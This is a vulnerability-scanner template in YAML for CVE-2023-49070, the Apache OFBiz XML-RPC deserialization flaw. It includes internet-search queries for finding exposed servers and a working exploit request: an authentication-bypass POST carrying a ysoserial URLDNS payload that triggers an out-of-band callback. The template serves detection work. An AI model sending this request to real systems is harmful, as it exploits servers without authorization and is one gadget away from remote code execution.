-
Notifications
You must be signed in to change notification settings - Fork 346
/
CVE-2023-49070.yaml
58 lines (55 loc) · 1.96 KB
/
CVE-2023-49070.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
id: CVE-2023-49070
info:
name: Apache OFBiz < 18.12.10 - Arbitrary Code Execution
author: Y3y1ng
severity: critical
verified: true
description: |
Apache OFBiz是美国阿帕奇(Apache)基金会的一套企业资源计划(ERP)系统,提供了一整套基于Java的Web应用程序组件和工具。
Apache OFBiz 在 18.12.10 版本之前存在远程代码执行漏洞。由于 XML-RPC 已经不再维护,经过身份认证的攻击者可以利用 XML-RPC 进行远程代码执行利用,从而控制服务器。
FOFA: app="Apache_OFBiz"
Hunter: app.name="OFBiz"
ZoomEye: app:"Apache OFBiz"
reference:
- https://mp.weixin.qq.com/s/se43Z1NlwLWEul5FcT5nug
- https://mp.weixin.qq.com/s/OYLKC_vPiyx0JzFX6Ia5FA
- https://mp.weixin.qq.com/s/_QaoaiVJUcYLN_QCfuGSLQ
- https://lists.apache.org/thread/jmbqk2lp4t4483whzndp5xqlq4f3otg3
- https://seclists.org/oss-sec/2023/q4/257
- https://twitter.com/Siebene7/status/1731870759130427726
- https://nvd.nist.gov/vuln/detail/CVE-2023-49070
- https://issues.apache.org/jira/browse/OFBIZ-12812
tags: seclists,cve,cve2023,apache,ofbiz,deserialization,rce
created: 2024/01/05
set:
reverse: newReverse()
reverseHost: reverse.url.host
base64payload: ysoserial("URLDNS",reverseHost,"base64")
rules:
r0:
request:
method: POST
path: /webtools/control/xmlrpc;/?USERNAME=&PASSWORD=s&requirePasswordChange=Y
headers:
Content-Type: application/xml
body: |
<?xml version="1.0"?>
<methodCall>
<methodName>RCE</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>RCE</name>
<value>
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">{{base64payload}}</serializable>
</value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>
expression: reverse.wait(5)
expression: r0()